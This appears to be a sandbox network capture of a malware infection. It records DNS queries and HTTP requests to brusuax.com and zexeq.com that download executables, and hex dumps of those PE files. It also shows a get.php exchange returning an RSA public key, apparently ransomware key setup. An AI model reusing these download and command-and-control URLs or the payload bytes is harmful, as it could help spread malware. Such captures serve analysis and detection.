Jan 9, 2024 15:46:11.219707966 CET	53	64104	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:11.219733000 CET	53	64104	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:11.219877958 CET	53	64104	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:11.261758089 CET	53	64104	1.1.1.1	192.168.2.10
Jan 9, 2024 15:46:41.905817986 CET	53075	53	192.168.2.10	1.1.1.1
Jan 9, 2024 15:46:42.010040998 CET	53	53075	1.1.1.1	192.168.2.10

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2024 15:46:09.747746944 CET	91	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: brusuax.com
Jan 9, 2024 15:46:10.893512011 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 09 Jan 2024 14:46:10 GMT Content-Type: application/octet-stream Content-Length: 252928 Last-Modified: Thu, 04 Jan 2024 11:20:03 GMT Connection: close ETag: "65969463-3dc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 1f a9 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 01 00 00 1c 44 00 00 00 00 00 51 1c 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 45 00 00 04 00 00 5e dc 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 22 02 00 50 00 00 00 00 40 44 00 d8 ad 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 1c 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3d ea 01 00 00 10 00 00 00 ec 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 cc 2b 00 00 00 00 02 00 00 2c 00 00 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 00 42 00 00 30 02 00 00 12 00 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 ad 01 00 00 40 44 00 00 ae 01 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELGdDQ@E^"P@D@.text= `.rdata+,@@.data\|B0@.rsrc@D.@@
Jan 9, 2024 15:46:10.893537998 CET	1286	IN	Data Raw: 66 8b 08 66 89 0a c3 cc cc cc cc cc cc cc cc cc 8a 08 88 0a c3 cc cc cc cc cc cc cc cc cc cc cc 81 00 47 86 c8 61 c3 cc cc cc cc cc cc cc cc cc 81 00 e1 34 ef c6 c3 cc cc cc cc cc cc cc cc cc 29 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b Data Ascii: ffGa4)UxEV0@W3=.uEuWxBWtBX<B\<BSE}MU`<Bd<BE?EM uEE.EuhWRWlBW
Jan 9, 2024 15:46:10.893552065 CET	308	IN	Data Raw: 81 3d d8 2e 84 00 a8 00 00 00 75 34 68 9c 13 42 00 6a 00 ff d7 6a 00 8d 55 f0 52 ff d3 6a 00 ff 15 0c 00 42 00 8d 45 e8 50 8d 8d bc f7 ff ff 51 ff 15 18 00 42 00 6a 00 6a 00 ff 15 94 00 42 00 46 3b 35 d8 2e 84 00 72 a1 8b 3d a8 00 42 00 8b 1d 88 Data Ascii: =.u4hBjjURjBEPQBjjBF;5.r=BB3.ujjhBjj(BjTBF!\|=@B3bu$Ft\|5\|B=hBBE{=.u3jPhBjhBhB
Jan 9, 2024 15:46:10.893567085 CET	1286	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec 2c 04 00 00 81 3d d8 2e 84 00 00 04 00 00 53 56 57 75 48 33 c9 33 c0 8d 54 24 0c 52 66 89 44 24 10 66 89 4c 24 12 8b 44 24 10 50 51 68 14 15 42 00 51 ff 15 ac 00 42 00 6a 00 6a 00 8d 4c 24 40 51 6a 00 ff Data Ascii: U,=.SVWuH33T$RfD$fL$D$PQhBQBjjL$@Qj\BD$t$\$=@B3*~ExuF]\|=DBB3$jBGm F\|\$=,B3j%+~tPxuF\|>B
Jan 9, 2024 15:46:11.054182053 CET	1286	IN	Data Raw: 43 53 e8 de 1e 00 00 59 85 c0 75 08 6a 1c e8 58 ff ff ff 59 e8 3f 1d 00 00 85 c0 75 08 6a 10 e8 47 ff ff ff 59 e8 d2 18 00 00 89 5d fc e8 76 16 00 00 85 c0 7d 08 6a 1b e8 9a 04 00 00 59 e8 5f 16 00 00 a3 78 30 84 00 e8 fe 15 00 00 a3 64 41 42 00 Data Ascii: CSYujXY?ujGY]v}jY_x0dABF}juY}jdYSY;tPRY]tMjYQPVh@ZE9uuP}5EMPQYYeEE}uPvE
Jan 9, 2024 15:46:11.054207087 CET	308	IN	Data Raw: ec 01 42 00 ff 15 c8 00 42 00 85 c0 74 15 68 dc 01 42 00 50 ff 15 48 00 42 00 85 c0 74 05 ff 75 08 ff d0 5d c3 8b ff 55 8b ec ff 75 08 e8 c8 ff ff ff 59 ff 75 08 ff 15 d0 00 42 00 cc 6a 08 e8 77 29 00 00 59 c3 6a 08 e8 94 28 00 00 59 c3 8b ff 55 Data Ascii: BBthBPHBtu]UuYuBjw)Yj(YUVt;ur^]UVu3ut;ur^]U=p0thp06Ytup0Y45hBhBYYuBhb4@4B$Bc=t0
Jan 9, 2024 15:46:11.364228010 CET	1286	IN	Data Raw: 42 00 0f 84 c5 00 00 00 89 1d 98 41 42 00 8a 45 10 a2 94 41 42 00 83 7d 0c 00 0f 85 9d 00 00 00 ff 35 68 30 84 00 e8 5e 13 00 00 59 8b f8 89 7d d8 85 ff 74 78 ff 35 64 30 84 00 e8 49 13 00 00 59 8b f0 89 75 dc 89 7d e4 89 75 e0 83 ee 04 89 75 dc Data Ascii: BABEAB}5h0^Y}tx5d0IYu}uu;rW%9t;rJ65h05d09}u9Et}}Eu}hBB_YhBBOYE}u(ABj&Yu
Jan 9, 2024 15:46:11.364253998 CET	1286	IN	Data Raw: e8 9b 37 00 00 40 59 83 f8 3c 76 38 56 e8 8e 37 00 00 83 ee 3b 03 c6 6a 03 b9 cc 44 42 00 68 8c 07 42 00 2b c8 51 50 e8 bb 36 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 55 04 00 00 83 c4 14 eb 02 33 f6 68 88 07 42 00 53 57 e8 21 36 00 00 Data Ascii: 7@Y<v8V7;jDBhB+QP6t3VVVVVU3hBSW!6tVVVVV1E40BSW5tVVVVVh h`BWo42jB;t$tjEP40B66YP6SB_^[j7Ytj7Yu=
Jan 9, 2024 15:46:11.364267111 CET	1286	IN	Data Raw: ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 89 8d f4 fd ff ff 8b 49 fc 89 8d e4 fd ff ff c7 85 Data Ascii: fffffEM0IBjB(PBuuj5YhBPBM3[VU5DBYt]js5Y]UE3;0BtA-
Jan 9, 2024 15:46:11.364281893 CET	1286	IN	Data Raw: ed 0f b7 08 66 85 c9 74 24 39 55 fc 75 0c 66 83 f9 20 74 19 66 83 f9 09 74 13 85 ff 74 0b 85 f6 74 05 66 89 0e 46 46 ff 03 40 40 eb 82 85 f6 74 07 33 c9 66 89 0e 46 46 ff 03 8b 7d 0c e9 32 ff ff ff 8b 45 08 3b c2 74 02 89 10 ff 07 5f 5e c9 c3 8b Data Ascii: ft$9Uuf tftttfFF@@t3fFF}2E;t_^UQQSVWhDBV33SfFBBx05AB;tf9uEPS]3`]YY?sJMs?Y;r4PV)Yt'EPV]EHYpABY5xAB
Jan 9, 2024 15:46:11.364293098 CET	1286	IN	Data Raw: 1b ff 35 e0 46 42 00 e8 65 ff ff ff 59 8b f0 56 ff 35 94 32 42 00 ff 15 14 01 42 00 8b c6 5e c3 a1 90 32 42 00 83 f8 ff 74 16 50 ff 35 e8 46 42 00 e8 3b ff ff ff 59 ff d0 83 0d 90 32 42 00 ff a1 94 32 42 00 83 f8 ff 74 0e 50 ff 15 18 01 42 00 83 Data Ascii: 5FBeYV52BB^2BtP5FB;Y2B2BtPB2BjhHB]TBVBuVYEuF\B3G~t$hDBPHBhpBu~pCKCFh2BjYevhBE>

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2024 15:46:11.551275969 CET	137	OUT	GET /test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
Jan 9, 2024 15:46:12.541258097 CET	770	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:18 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 566 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 30 4a 64 77 62 52 6b 30 44 45 51 5c 2f 4e 48 48 31 59 6d 50 38 5c 5c 6e 71 59 66 64 62 4f 53 50 34 70 4c 32 4e 77 30 74 32 75 30 4c 6a 53 35 76 41 30 49 63 5c 2f 71 5c 2f 46 5c 2f 46 4a 67 39 6f 68 47 74 7a 71 6e 35 62 45 52 78 6a 74 6a 69 63 78 38 50 32 4b 31 56 43 62 34 5c 5c 6e 79 67 73 31 31 38 2b 7a 6d 42 4d 69 32 4f 4e 31 6d 5c 2f 61 57 72 68 67 66 45 7a 50 66 6d 74 54 54 4e 53 57 39 46 77 65 30 57 69 6e 67 41 37 7a 4d 75 51 52 36 61 31 69 63 37 4e 65 65 71 66 6d 2b 5c 5c 6e 4f 52 5a 5a 4a 31 5a 62 51 57 75 38 67 4a 67 5c 2f 54 63 4c 50 4b 7a 36 41 51 49 35 4f 47 33 41 49 73 39 52 6c 45 37 33 68 34 4b 6f 44 67 41 7a 50 62 49 6b 5c 2f 65 5a 37 70 79 68 41 6c 6e 4c 62 31 5c 5c 6e 46 77 57 49 38 6b 68 41 75 35 6f 72 6d 35 6b 4a 7a 69 74 57 45 76 72 76 38 54 79 63 6d 33 36 65 32 4e 37 38 75 73 33 62 6c 2b 76 2b 44 66 43 50 49 4c 72 6b 7a 2b 64 4b 72 51 78 51 6a 71 53 4e 5c 5c 6e 36 58 75 54 70 37 34 4f 5a 58 39 68 45 36 45 66 4a 5c 2f 42 58 73 6c 6b 78 58 2b 5c 2f 4d 6e 6f 4f 38 37 31 55 68 66 35 6c 38 4d 67 5c 2f 2b 7a 66 35 5c 2f 59 56 6a 58 38 5c 2f 66 6b 33 45 33 58 75 6e 67 4b 5c 5c 6e 33 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 54 6b 56 48 66 43 49 49 77 61 41 79 44 4a 75 46 70 42 45 67 7a 49 5a 67 59 37 49 58 44 36 43 39 6f 72 6d 52 41 7a 49 66 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JdwbRk0DEQ\/NHH1YmP8\\nqYfdbOSP4pL2Nw0t2u0LjS5vA0Ic\/q\/F\/FJg9ohGtzqn5bERxjtjicx8P2K1VCb4\\nygs118+zmBMi2ON1m\/aWrhgfEzPfmtTTNSW9Fwe0WingA7zMuQR6a1ic7Neeqfm+\\nORZZJ1ZbQWu8gJg\/TcLPKz6AQI5OG3AIs9RlE73h4KoDgAzPbIk\/eZ7pyhAlnLb1\\nFwWI8khAu5orm5kJzitWEvrv8Tycm36e2N78us3bl+v+DfCPILrkz+dKrQxQjqSN\\n6XuTp74OZX9hE6EfJ\/BXslkxX+\/MnoO871Uhf5l8Mg\/+zf5\/YVjX8\/fk3E3XungK\\n3wIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf"}

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2024 15:46:11.614729881 CET	126	OUT	GET /test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
Jan 9, 2024 15:46:12.646827936 CET	770	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:18 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 566 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 30 4a 64 77 62 52 6b 30 44 45 51 5c 2f 4e 48 48 31 59 6d 50 38 5c 5c 6e 71 59 66 64 62 4f 53 50 34 70 4c 32 4e 77 30 74 32 75 30 4c 6a 53 35 76 41 30 49 63 5c 2f 71 5c 2f 46 5c 2f 46 4a 67 39 6f 68 47 74 7a 71 6e 35 62 45 52 78 6a 74 6a 69 63 78 38 50 32 4b 31 56 43 62 34 5c 5c 6e 79 67 73 31 31 38 2b 7a 6d 42 4d 69 32 4f 4e 31 6d 5c 2f 61 57 72 68 67 66 45 7a 50 66 6d 74 54 54 4e 53 57 39 46 77 65 30 57 69 6e 67 41 37 7a 4d 75 51 52 36 61 31 69 63 37 4e 65 65 71 66 6d 2b 5c 5c 6e 4f 52 5a 5a 4a 31 5a 62 51 57 75 38 67 4a 67 5c 2f 54 63 4c 50 4b 7a 36 41 51 49 35 4f 47 33 41 49 73 39 52 6c 45 37 33 68 34 4b 6f 44 67 41 7a 50 62 49 6b 5c 2f 65 5a 37 70 79 68 41 6c 6e 4c 62 31 5c 5c 6e 46 77 57 49 38 6b 68 41 75 35 6f 72 6d 35 6b 4a 7a 69 74 57 45 76 72 76 38 54 79 63 6d 33 36 65 32 4e 37 38 75 73 33 62 6c 2b 76 2b 44 66 43 50 49 4c 72 6b 7a 2b 64 4b 72 51 78 51 6a 71 53 4e 5c 5c 6e 36 58 75 54 70 37 34 4f 5a 58 39 68 45 36 45 66 4a 5c 2f 42 58 73 6c 6b 78 58 2b 5c 2f 4d 6e 6f 4f 38 37 31 55 68 66 35 6c 38 4d 67 5c 2f 2b 7a 66 35 5c 2f 59 56 6a 58 38 5c 2f 66 6b 33 45 33 58 75 6e 67 4b 5c 5c 6e 33 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 54 6b 56 48 66 43 49 49 77 61 41 79 44 4a 75 46 70 42 45 67 7a 49 5a 67 59 37 49 58 44 36 43 39 6f 72 6d 52 41 7a 49 66 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JdwbRk0DEQ\/NHH1YmP8\\nqYfdbOSP4pL2Nw0t2u0LjS5vA0Ic\/q\/F\/FJg9ohGtzqn5bERxjtjicx8P2K1VCb4\\nygs118+zmBMi2ON1m\/aWrhgfEzPfmtTTNSW9Fwe0WingA7zMuQR6a1ic7Neeqfm+\\nORZZJ1ZbQWu8gJg\/TcLPKz6AQI5OG3AIs9RlE73h4KoDgAzPbIk\/eZ7pyhAlnLb1\\nFwWI8khAu5orm5kJzitWEvrv8Tycm36e2N78us3bl+v+DfCPILrkz+dKrQxQjqSN\\n6XuTp74OZX9hE6EfJ\/BXslkxX+\/MnoO871Uhf5l8Mg\/+zf5\/YVjX8\/fk3E3XungK\\n3wIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf"}

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2024 15:46:20.055151939 CET	94	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
Jan 9, 2024 15:46:21.164530993 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 09 Jan 2024 14:46:27 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>\|@.rsrc/>0~@@
Jan 9, 2024 15:46:21.164599895 CET	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 00 00 00 00 f6 6b 03 00 0c 6c 03 00 22 6c 03 00 2e 6c 03 00 48 6c 03 00 5a 6c 03 00 70 6c 03 00 86 6c 03 00 96 6c 03 00 ac 6c 03 00 c0 6c 03 00 d0 6c Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnnnoo,o@oTo`opoookoo
Jan 9, 2024 15:46:21.447674990 CET	1286	IN	Data Raw: 75 00 77 00 00 00 53 00 6f 00 6c 00 6f 00 66 00 75 00 64 00 69 00 20 00 67 00 6f 00 78 00 6f 00 72 00 75 00 76 00 20 00 73 00 61 00 70 00 6f 00 63 00 75 00 7a 00 69 00 00 00 4e 00 69 00 6d 00 69 00 67 00 6f 00 74 00 20 00 67 00 69 00 66 00 6f 00 Data Ascii: uwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefej
Jan 9, 2024 15:46:21.448290110 CET	1286	IN	Data Raw: 63 00 68 00 61 00 72 00 3e 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 20 00 3e 00 20 00 3e 00 3a 00 3a 00 6f 00 Data Ascii: char>,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual
Jan 9, 2024 15:46:21.448856115 CET	1286	IN	Data Raw: 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 62 00 61 00 73 00 69 00 63 00 5f 00 73 00 74 00 72 00 69 00 6e 00 67 00 3c 00 63 00 68 00 61 00 72 00 2c 00 Data Ascii: ::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_ite
Jan 9, 2024 15:46:21.449378967 CET	1286	IN	Data Raw: 3e 00 3d 00 20 00 63 00 6f 00 75 00 6e 00 74 00 00 00 00 00 73 00 72 00 63 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 Data Ascii: >= countsrc != NULLmemcpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.cdst != NULLmemmove_sf:\dd\vctools\crt_
Jan 9, 2024 15:46:21.730220079 CET	1286	IN	Data Raw: 68 00 65 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 Data Ascii: he Visual C++ documentation on asserts.memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)),
Jan 9, 2024 15:46:21.730336905 CET	1286	IN	Data Raw: 00 00 00 00 28 00 73 00 74 00 72 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 00 00 70 00 75 00 74 00 63 00 00 00 00 00 76 00 73 00 63 00 61 00 6e 00 66 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 Data Ascii: (str != NULL)putcvscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\
Jan 9, 2024 15:46:21.731353998 CET	1286	IN	Data Raw: 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69 67 6e 65 64 5f 72 65 61 6c 6c 6f 63 28 29 00 00 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 Data Ascii: routines, use _aligned_realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-alloca
